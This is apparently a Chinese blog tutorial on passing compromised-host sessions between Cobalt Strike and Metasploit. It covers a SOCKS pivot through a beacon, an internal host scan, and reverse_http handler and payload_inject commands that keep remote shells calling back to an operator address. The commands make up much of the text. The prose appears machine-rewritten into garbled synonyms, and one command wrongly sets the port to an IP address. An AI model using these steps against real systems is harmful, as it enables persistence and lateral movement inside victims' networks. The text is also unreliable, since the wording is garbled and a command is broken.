Cobaltstrike与MSF对话继承

序言

一般在渗入的全过程中,Get到shell以后一般来说我很喜欢发布到Cobaltstrike,可是Cobaltstrike的对话是60S升级一次，有时作用也并沒有MSF健全(我的软件不足强大嘿嘿),那麼今天我提前准备纪录一下怎样完成Cobaltstrike与MSF的连动,而且在下面2~3篇文章内容里，我提前准备主要讲一下隧道施工技术性,尤其是SSH隧道施工技术性、SOCK4隧道施工技术性、SOCK5隧道施工技术性。

文章正文

Cobastrike构建SockS隧道施工

最先Cobaltstrike获得一个对话,随后构建SockS。

随后再view里寻找Proxy Pivots,点一下Tunnel查询网络设置。

开启Metasploit,设定Socks代理商

msf6 > setg Proxies socks4:192.168.37.129:8265 //设定走Cobaltstrike的代理商安全通道
Proxies => socks4:192.168.37.129:8265			
msf6 >  setg ReverseAllowProxy true				//设定容许双重安全通道
ReverseAllowProxy => true
msf6 > use auxiliary/scanner/ip/ipidseq  		//设定找寻空余服务器
msf6 auxiliary(scanner/ip/ipidseq) > show options
msf6 auxiliary(scanner/ip/ipidseq) > set RHOSTS 192.168.37.128-135
RHOSTS => 192.168.37.128-135
msf6 auxiliary(scanner/ip/ipidseq) > run

发觉取得成功扫描仪到空余服务器：

Cobaltstrike继承对话

当Cobaltstrike获得到发布服务器后,有时必须传送对话到MSF,实际操作以下:

最先创建新的Foreign HTTP窃听器,设定IP为MSF接受的IP,设定Port是一会儿MSF监视的端口号

随后开启MSF,设定好窃听器:

msf6 > use exploit/multi/handler 
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload Windows/meterpreter/reverse_http
payload => windows/meterpreter/reverse_http
msf6 exploit(multi/handler) > set lhost 192.168.37.134
lhost => 192.168.37.134
msf6 exploit(multi/handler) > set lport 8088
lport => 8088
msf6 exploit(multi/handler) > run -j

随后开启Cobaltstrike，分享对话，方式 以下，在对话栏里挑选spawn,挑选payload为刚刚设定的MSFpayload,挑选Choose后Metasploit接受到对话。

Metasploit继承对话

假如Metasploit早已获得到一个对话，能够根据payload_inject控制模块开展对话继承,将对话传送到Cobaltstrike。

这儿我试着首先用MSF开展总流量数据加密，再开展对话继承，实际可参考blog:https://www.cnblogs.com/culin/#/c/subject/p/15119863.html。

实际操作以下,最先Cobaltstrike创建新Becon HTTP的窃听器,设定好监视的IP和Port

随后获得到MSF的对话后，必须启用payload_inject控制模块，方式 以下

msf6> use exploit/windows/local/payload_inject 
msf6> set payload windows/meterpreter/reverse_http  //留意payload的配对
msf6> set session 2					//必须分享对话的SESSION
msf6> set lhost 192.168.34.129		//设定必须分享的IP
msf6> set lport 192.168.34.129 		//设定必须分享的port
msf6> run							//逐渐分享

能够取得成功见到对话就分享成功了：

这时Cobaltstrike的对话也会被数据加密，更为的安全性一。